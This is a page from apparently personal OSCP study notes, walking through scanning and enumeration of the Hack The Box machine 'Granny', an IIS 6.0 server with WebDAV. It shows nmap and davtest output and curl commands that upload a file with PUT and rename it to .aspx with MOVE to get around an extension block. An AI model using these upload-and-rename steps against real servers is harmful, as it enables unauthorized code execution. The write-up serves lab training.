📗
OSCP Prep
  • OSCP Preperation
  • Hack the Box Linux
    • Bashed
    • Nibbles
    • Sense
    • Conceal
    • La Casa de Papel
    • Lightweight
    • Jerry
      • Scanning and Enumeration
    • Jarvis
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
      • Lesson's Learned
    • TartarSauce
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
      • Lessons Learned
    • Poison
      • Turning LFI into RFI
      • Exploitation
      • Post Exploitation
      • Lessons Learned
    • Node(Comeback to)
      • Scanning and Enumeration
      • Exploitation
    • SolidState
      • Scanning and Enumeration
      • Exploitation and POSTY
      • Lessons Learned
    • Nineveh
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
      • Lessons learned
    • Cronos
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
      • Lessons Learned
    • SwagShop
      • Scanning and Enumeration
      • Exploitation
      • Lessons Learned
    • Networked
      • Exploitation
    • FriendZoned
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
      • Lessons learned
    • Sunday
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
      • Lessons Learned
    • Valentine
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
      • Lessons Learned
    • Irked
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
      • Lessons Learned
    • Kotarak
    • Nibbles
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
      • Lessons Learned
  • Hack the Box Windows
    • Bounty
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
    • Blue
      • Scanning and Enumeration
      • Lessons Learned
    • Granny
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
      • Lessons Learned
    • Grandpa
      • Scanning and Enumeration
      • Exploitation
      • Lessons Learned
    • Arctic
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
      • Lessons Learned
    • Optimum
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
      • Lessons Learned
    • Devel
      • Scanning and Enumeration
      • Exploitation
      • Post Exploitation
    • Legacy (comeback to )
      • Scanning and Enumeration
      • Exploitation
  • Slick Tricks
    • Banned by Bruteforce? Try this!
    • Hydra for Web Logins
    • Grepping
    • Redirecting all Script Traffic to Burp
    • Word Count
    • Reverse Shell Tricks
    • Transfering files
  • Nmap Help
  • Linux Guide
    • Linux Shortcuts
  • Privelege Escalation
    • Linux Privilege Escalation
Powered by GitBook
On this page
  • Scanning
  • Enumeration
  • Changing the Extension

Was this helpful?

  1. Hack the Box Windows
  2. Granny

Scanning and Enumeration

Scanning

root@kali:/home/kali# nmap -sC -sV -p 80 10.10.10.15
Starting Nmap 7.91 ( https://nmap.org ) at 2020-11-24 00:24 EST
Nmap scan report for 10.10.10.15
Host is up (0.092s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Microsoft IIS httpd 6.0
| http-methods: 
|_  Potentially risky methods: TRACE DELETE COPY MOVE PROPFIND PROPPATCH SEARCH MKCOL LOCK UNLOCK PUT
| http-ntlm-info: 
|   Target_Name: GRANNY
|   NetBIOS_Domain_Name: GRANNY
|   NetBIOS_Computer_Name: GRANNY
|   DNS_Domain_Name: granny
|   DNS_Computer_Name: granny
|_  Product_Version: 5.2.3790
|_http-server-header: Microsoft-IIS/6.0
|_http-title: Under Construction
| http-webdav-scan: 
|   Server Date: Tue, 24 Nov 2020 05:32:22 GMT
|   Allowed Methods: OPTIONS, TRACE, GET, HEAD, DELETE, COPY, MOVE, PROPFIND, PROPPATCH, SEARCH, MKCOL, LOCK, UNLOCK
|   Public Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE, MKCOL, PROPFIND, PROPPATCH, LOCK, UNLOCK, SEARCH
|   Server Type: Microsoft-IIS/6.0
|_  WebDAV type: Unknown
Service Info: OS: Windows; CPE: cpe:/o:microsoft:windows

Enumeration

The scan shows that the HTTP PUT method is allowed. This could possibly ive us the ability to save files on the web server. Since this is Microsoft IIS web server, the type of files it executes are ASP and ASPX.

root@kali:/home/kali# davtest --url http://10.10.10.15
********************************************************
 Testing DAV connection
OPEN            SUCCEED:                http://10.10.10.15
********************************************************
NOTE    Random string for this session: NHiJopznpIc5RJ
********************************************************
 Creating directory
MKCOL           SUCCEED:                Created http://10.10.10.15/DavTestDir_NHiJopznpIc5RJ
********************************************************
 Sending test files
PUT     asp     FAIL
PUT     jhtml   SUCCEED:        http://10.10.10.15/DavTestDir_NHiJopznpIc5RJ/davtest_NHiJopznpIc5RJ.jhtml
PUT     cfm     SUCCEED:        http://10.10.10.15/DavTestDir_NHiJopznpIc5RJ/davtest_NHiJopznpIc5RJ.cfm
PUT     aspx    FAIL
PUT     txt     SUCCEED:        http://10.10.10.15/DavTestDir_NHiJopznpIc5RJ/davtest_NHiJopznpIc5RJ.txt
PUT     html    SUCCEED:        http://10.10.10.15/DavTestDir_NHiJopznpIc5RJ/davtest_NHiJopznpIc5RJ.html
PUT     pl      SUCCEED:        http://10.10.10.15/DavTestDir_NHiJopznpIc5RJ/davtest_NHiJopznpIc5RJ.pl
PUT     php     SUCCEED:        http://10.10.10.15/DavTestDir_NHiJopznpIc5RJ/davtest_NHiJopznpIc5RJ.php
PUT     shtml   FAIL
PUT     cgi     FAIL
PUT     jsp     SUCCEED:        http://10.10.10.15/DavTestDir_NHiJopznpIc5RJ/davtest_NHiJopznpIc5RJ.jsp
********************************************************
 Checking for test file execution
EXEC    jhtml   FAIL
EXEC    cfm     FAIL
EXEC    txt     SUCCEED:        http://10.10.10.15/DavTestDir_NHiJopznpIc5RJ/davtest_NHiJopznpIc5RJ.txt
EXEC    html    SUCCEED:        http://10.10.10.15/DavTestDir_NHiJopznpIc5RJ/davtest_NHiJopznpIc5RJ.html
EXEC    pl      FAIL
EXEC    php     FAIL
EXEC    jsp     FAIL

********************************************************
/usr/bin/davtest Summary:
Created: http://10.10.10.15/DavTestDir_NHiJopznpIc5RJ
PUT File: http://10.10.10.15/DavTestDir_NHiJopznpIc5RJ/davtest_NHiJopznpIc5RJ.jhtml
PUT File: http://10.10.10.15/DavTestDir_NHiJopznpIc5RJ/davtest_NHiJopznpIc5RJ.cfm
PUT File: http://10.10.10.15/DavTestDir_NHiJopznpIc5RJ/davtest_NHiJopznpIc5RJ.txt
PUT File: http://10.10.10.15/DavTestDir_NHiJopznpIc5RJ/davtest_NHiJopznpIc5RJ.html
PUT File: http://10.10.10.15/DavTestDir_NHiJopznpIc5RJ/davtest_NHiJopznpIc5RJ.pl
PUT File: http://10.10.10.15/DavTestDir_NHiJopznpIc5RJ/davtest_NHiJopznpIc5RJ.php
PUT File: http://10.10.10.15/DavTestDir_NHiJopznpIc5RJ/davtest_NHiJopznpIc5RJ.jsp
Executes: http://10.10.10.15/DavTestDir_NHiJopznpIc5RJ/davtest_NHiJopznpIc5RJ.txt
Executes: http://10.10.10.15/DavTestDir_NHiJopznpIc5RJ/davtest_NHiJopznpIc5RJ.html

ASP and ASPX are not allowed. However, TXT and HTML files are allowed. Recall, PUT HTTP method was not the only method, also have the MOVE HTTP Method. The MOVE method can be used to change file locations on the web server AND can also be used to RENAME files. LETS upload and HTML file on tlhe web server and rename it to change the extension to an ASPX file. 

root@kali:~/Desktop/HTB/Granny# curl -X PUT http://10.10.10.15/test.html -d @test.html
root@kali:~/Desktop/htb/granny# curl http://10.10.10.15/test.html
<h1>Hello</h1>

Changing the Extension

root@kali:~/Desktop/htb/granny# curl -X MOVE --header 'Destination:http://10.10.10.15/test.aspx' 'http://10.10.10.15/test.html'
root@kali:~/Desktop/htb/granny# curl http://10.10.10.15/test.aspx
<h1>Hello</h1>

This confirms that we can upload ASPX code on the server.

PreviousGrannyNextExploitation

Last updated 4 years ago

Was this helpful?